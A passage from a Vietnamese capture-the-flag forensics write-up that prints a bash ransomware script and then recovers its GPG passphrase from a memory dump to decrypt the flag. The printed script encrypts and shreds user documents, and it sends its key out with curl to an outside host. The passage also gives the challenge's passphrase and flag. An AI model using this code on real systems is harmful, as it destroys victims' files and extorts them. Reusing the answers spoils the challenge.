UyMFlNK2t4SlM4TkJYb2FlUkNISnRWLzg5ZnZYSWJoT285dmpsdS9YWHUrWTFpR1gyVHN3RFkKTmFheFc5Ymlrb2xHRzdXYkpUYk5XSEx2VTY4aGxsbWtaMDB6a0lSNHc2alc0TUJkTkZ6VFVSbEJ4MWlYbGw1SwpUQWVnWC9SdFZmeSt0aEdrbFJFQ3BPT1dpY1dCeFdyeTFKSW5UR1BtZnpKaEZWOU5WU0ROWEdteGZ1YVRXZUhICnRDMG9FMkxKZVlyakRNV0xnR0VXTERMYlhDdURtZXo1M0dwSjN2MHlGckplNGkyZVI1Z0x1OG9UNWlaV0xDNnYKMzdQeVc3bXYyeHZQNGNlZExZdk1CMVZ1UlBuSW01T1U2UjJtelNHQS8zNnBKWHhYU3RjY01JamJ5dDNUbFNxbAordHJyQ2ZHUzNjMzRzVmgrN1RNUHRHZTdCbHR4ZjI5UzhMd1dudUt1R00rNUFZMEVZOXJYK3dFTUFLNW0vdm1TCmJTb3p0cXFzV1dpNTN1UFJ3UWxqejZHd0g5emhDbENzRW4xZk9QRktZc0JLcmpFQXpsRUZ2VTh3UGhiVm5EdFAKNERtRFp0Wk9UN3pxSjFseUdXUnliOEdjSnpHWXYvRDJVcnZaMVZCUHBoUlVNU2lQZUljNnk0ckI5Vkh5ZjVRNApwdmFub1hlWVkyYVd4S09zdUl2aUJDRkJWalE0Q0dqbUlBMkZOdWFwZEFnSFZJRHZmTU9nblorbnRFNVdhSWZlCjBCdzlMK05OaTloV04vODlnMG9BeDNDVksybVVPUUJ3Z3NBR1kvdFdjc3lGc3YwWlRBLzczRXg0U05VMXdtUG0KeDNheVVsTjhhRENPMlhaanBpMitLY0NOV2hpYmFKbWp5SkZzK3ZIbzJ6TlpDaExGQWtObmZzSHczdHdTU1ZNQQovck56UE0zU2xhb2QvK2dDY0xEUEh0Y0xpcGF3RXlHcWRtd0hBakpTaEt4eFJpaG1YbzVoRjc1bUF3ckNSL2g5Ck1zb0phOW5DMDF5NXBMemZ4c1ZZRzBneXhyamdLVEpGcElCWDJ5SmtPSHlDMndrWUg2aVZxbDExMnRmOHpNZ3gKYWFmQnFqenNMZWNzcXZzYzA5SHRnZnpWZVM1bXpUN2dLajMxeXNuNjZxMCtmOVBXREJ5RzF3aHVUUUFSQVFBQgppUUcyQkJnQkNnQWdGaUVFRldlak1OSmpVSTN5Q0FCSS8wY05HNUtVWWxZRkFtUGExL3NDR3d3QUNna1EvMGNOCkc1S1VZbFpBOUF3QXRNOTVITk5QcWVqR0RwZmhmSUhWdy9HZkhKaGRpeUQ2NXJxWE5XckZFdzVJYVpVeWl0WUMKUFVPbmE3bGtFSW05aEkyaVpKc04vWEVnMWw5TVhpRzBHTzRqTjhvT0ZybnNHb3NNbUNJS2p3eDR5US9oTndKNQpuM3Fvb1cvRlErQTRQNmkvZDJERGtZK2NEdDhpUm1LTUhLa3dZcU9VV0hob2wwT3JwT1lYUUIrTjdwSFg5dCtaCld0NjU5YkxpUzRlcGt6YzRDUm9OSHZhZnY0bFdKaGJtWnowSitFd0U2QlBoNWN4WDA3aUEwbDdobjBQSW1jZ0gKKzdUL0xlZWZseHNKeXpiUWlXakd0UC9Ia2ZpbGg5ZStjSjZWcjlsNSs5SEFHaVB1L0JWK05qcTdCb2Mwc0lUKwpLbGFkVzJoUFV1WnQyeSsxaWg3NUtrZGdWb3k0amhhMENsTE9aQ1ZtODhNTXRLWXJ0S2ttZUkrMUtJVFE1NWhGCmRuYWZtaWdxcjB5M0dVTVBseFRRVmR5ZElnRHNzSXhWdlptWG8rd3lNbE4vL0hTS1Q5ZnpwOHhQL1g5bjhZWDcKcmZ1SkdBd3JKbWVLVFdHRWhrOUdOLzk2RTV6N2JOS2RQcWI5WHN3enF4QjMvVTBPWGRHemNpK1h6VURVVVI5cwo3S2dCZ3VXY0xXYWUKPXFqVzcKLS0tLS1FTkQgUEdQIFBVQkxJQyBLRVkgQkxPQ0stLS0tLQ==" echo $tljyVe4o7K3yOdj | base64 --decode | gpg --import echo -e "5\ny\n" | gpg --command-fd 0 --edit-key "RansomKey" trust } MMYPE1MNIGuGPBmyCUo6() { DhQ52B6UugM1WcX=`strings /dev/urandom | grep -o '[[:alnum:]]' | head -n 16 | tr -d '\n'` echo $DhQ52B6UugM1WcX > RxgXlDqP0h3baha gpg --batch --yes -r "RansomKey" -o qgffrqdGlfhrdoE -e RxgXlDqP0h3baha shred -u RxgXlDqP0h3baha curl --request POST --data-binary "@qgffrqdGlfhrdoE" https://files.pypi-install.com/packages/recv.php for i in *.txt *.doc *.docx *.pdf *.kdbx *.gz *.rar; do if [[ ${i} != *"*."* ]];then echo $DhQ52B6UugM1WcX | gpg --batch --yes -o "$i".a59ap --passphrase-fd 0 --symmetric --cipher-algo AES256 "$i" 2>/dev/null shred -u "$i" 2>/dev/null fi done unset DhQ52B6UugM1WcX } v0nPa1GinWR3Dr27cnmT() { cat <<- EOF -------------------------------------------------------------------------- YOUR FILES ARE ENCRYPTED BY AN EXTRATERRESTRIAL RANSOMWARE * What happened? Most of your files are no longer accessible because they have been encrypted. Do not waste your time trying to find a way to decrypt them; it is impossible without our private key. * How to recover my files? Recovering your files is 100% guaranteed if you follow our instructions. One file per infection can be decrypted as proof of work. To decrypt the rest, you must return the relic back to its previous rightful owners. * Is there a deadline? Of course, there is. You have ten days left. Do not miss this deadline. -------------------------------------------------------------------------- EOF } ExoPFDWb3uT189e() { uFMHx73AXNF6CTsbtzYM MMYPE1MNIGuGPBmyCUo6 v0nPa1GinWR3Dr27cnmT } if [[ "$(whoami)" == "developer7669633432" ]]; then if [ -x "$(command -v gpg)" ]; then ExoPFDWb3uT189e exit 1 fi fi ``` Ok đọc hiểu sơ qua về nó thì mình nghi ngờ về đoạn này : `gpg --batch --yes -r "RansomKey" -o qgffrqdGlfhrdoE -e RxgXlDqP0h3baha` Giải thích về nó 1 chút : ``` Lệnh "gpg --batch --yes -r "RansomKey" -o qgffrqdGlfhrdoE -e RxgXlDqP0h3baha" là một lệnh dòng lệnh cho phép mã hóa một tệp tin văn bản (ở đây là tệp tin có tên là "RxgXlDqP0h3baha") bằng công cụ mã hóa GPG (GNU Privacy Guard) và lưu tệp tin đã mã hóa với tên "qgffrqdGlfhrdoE". Cụ thể, lệnh này sử dụng các tùy chọn sau: "--batch": Chạy GPG ở chế độ không tương tác và không yêu cầu xác nhận từ người dùng. "--yes": Tự động trả lời "yes" cho bất kỳ câu hỏi nào được yêu cầu. "-r": Chỉ định khóa công khai được sử dụng để mã hóa tệp tin. Trong trường hợp này, khóa công khai được sử dụng có tên là "RansomKey". "-o": Chỉ định tên tệp tin đầu ra của tệp tin đã mã hóa. "-e": Chỉ định rằng tệp tin đầu vào sẽ được mã hóa bằng thuật toán mã hóa. ``` Oh nó có đề cập đến khóa công khai với keyword là `RansomKey` mà trùng hợp thay đó là có 1 công cụ để khôi phục lại passphrase file mem đó là [volatility_gpg](https://github.com/kudelskisecurity/volatility-gpg) Và điều quan trọng nx đó là tệp bị mã hóa qgffrqdGlfhrdoE thực chất chính là flag.txt.a59ap ![](https://i.imgur.com/ZSxeB6z.png) Oke bây giờ ta sẽ test xem thử file mem có chứa passphrase ko, trước tiên ta `$git clone https://github.com/kudelskisecurity/volatility-gpg` về sau đó chuyển nó vào lun folder volatility3 để dễ làm. Thực thi lệnh để khôi phục lại passphrase : `python3 vol.py -f forensics.mem -p volatility-gpg gpg_full` Quả nhiên ko sai, nó đã ra passphrase ạ =)) : ![](https://i.imgur.com/Lowv89s.png) `passphrase : wJ5kENwyu8amx2RM` Ok bây giờ chúng ta đã có passphrase => dùng [gpg](https://amourspirit.github.io/mega_scripts/GnuPGEncryptandDecrypt.html) để decrypt file flag.txt.a59ap Dùng lệnh : `gpg --decrypt --pinentry-mode loopback --passphrase wJ5kENwyu8amx2RM flag.txt.a59ap` * Chú thích : --pinentry-mode loopback nghĩa là GPG sẽ sử dụng một quá trình con để yêu cầu mật khẩu từ người dùng mà không yêu cầu tương tác người dùng trực tiếp. Quá trình con này sẽ lặp lại việc yêu cầu mật khẩu cho đến khi mật khẩu được cung cấp đúng hoặc quá trình bị hủy bỏ. Và cuối cùng mình có được flag của nó : ![](https://i.imgur.com/Dwsn2SB.png) `Flag: HTB{n0_n33d_t0_r3turn_th3_r3l1c_1_gu3ss}`